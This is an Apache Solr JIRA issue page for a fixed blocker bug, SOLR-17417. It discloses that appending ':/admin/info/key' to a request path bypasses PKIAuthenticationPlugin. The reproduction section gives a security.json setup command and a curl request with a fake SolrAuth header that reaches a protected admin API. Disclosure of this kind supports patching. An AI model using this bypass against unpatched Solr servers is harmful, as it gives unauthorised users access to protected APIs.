[SOLR-17417] Authentication bypass possible using a fake :/admin/info/key URL Path ending - ASF JIRA

Attach files

Attach Screenshot

Voters

Watch issue

Watchers

Create sub-task

Link

Clone

Update Comment Author

Replace String in Comment

Update Comment Visibility

Delete Comments

XML

Word

Printable

JSON

Details

Type: Bug
Status: Closed
Priority: Blocker
Resolution: Fixed
Affects Version/s: None
Fix Version/s: 8.11.3, 9.7
Component/s: Authorization
Labels:
None

Description

By using ":/admin/info/key" at the end of the URL, the PKIAuthenticationPlugin can be bypassed, so that non-authorized users can access protected APIs.

Reproduction:

Start Solr
./zkcli.sh -zkhost localhost:9983 -cmd put /security.json '{"authentication":{"class":"solr.BasicAuthPlugin","credentials":{"solr":"IV0EHq1OnNrj6gvRCwvFwTrZ1+z1oBbnQdiVC3otuq0= Ndd7LKvVBAaZIF0QAVi1ekCfAJXr1GGfLtRUXhgrF8c=","authorization":{"class":"solr.RuleBasedAuthorizationPlugin","permissions":[ {"name":"security-edit","role":"admin"}
],"user-role":{"solr":"admin"}}}'}}
curl -H "SolrAuth: XXXXX" http://127.0.0.1:8983/solr/admin/info/properties:/admin/info/key

The request should fail, but it will succeed.

Attachments

SOLR-17417.patch
21/Aug/24 19:56
2 kB
Houston Putman

Activity

Comment

This comment will be Viewable by All Users Viewable by All Users

Cancel

People

Assignee:: Houston Putman

Reporter:: Houston Putman

Votes:: 0 Vote for this issue

Watchers:: 5 Start watching this issue

Dates

Created:: 21/Aug/24 19:47

Updated:: 21/Oct/24 21:00

Resolved:: 27/Aug/24 20:06

Agile

View on Board

Authentication bypass possible using a fake :/admin/info/key URL Path ending

Details

Description

Attachments

Attachments

Activity

People

Dates

Agile

Slack

Issue deployment